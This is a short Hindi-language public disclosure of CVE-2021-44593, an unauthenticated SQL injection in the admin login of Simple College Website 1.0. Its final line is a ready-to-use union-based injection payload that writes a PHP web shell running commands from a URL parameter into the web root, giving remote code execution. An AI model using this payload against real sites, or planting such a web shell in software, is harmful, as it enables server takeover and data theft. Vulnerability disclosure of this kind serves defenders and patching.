
# CVE-2021-44593 का सार्वजनिक खुलासा और विवरण, Simple College Website में एक अनधिकृत SQL इंजेक्शन जो मनमाने फ़ाइल अपलोड और रिमोट कोड निष्पादन की ओर ले जाता है।
CVE-2021-44593 का सार्वजनिक खुलासा। Simple College Website में SQL इंजेक्शन/मनमाना फ़ाइल अपलोड/रिमोट कोड निष्पादन भेद्यता।
Simple College Website 1.0 /admin/login.php पृष्ठ के "username" पैरामीटर में एक बिना प्रमाणीकरण वाले union-आधारित SQL इंजेक्शन के प्रति संवेदनशील है, जिसका उपयोग मनमानी फ़ाइलें अपलोड करने और रिमोट कोड निष्पादन प्राप्त करने के लिए किया जा सकता है।
admin_class.php में login() फ़ंक्शन
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -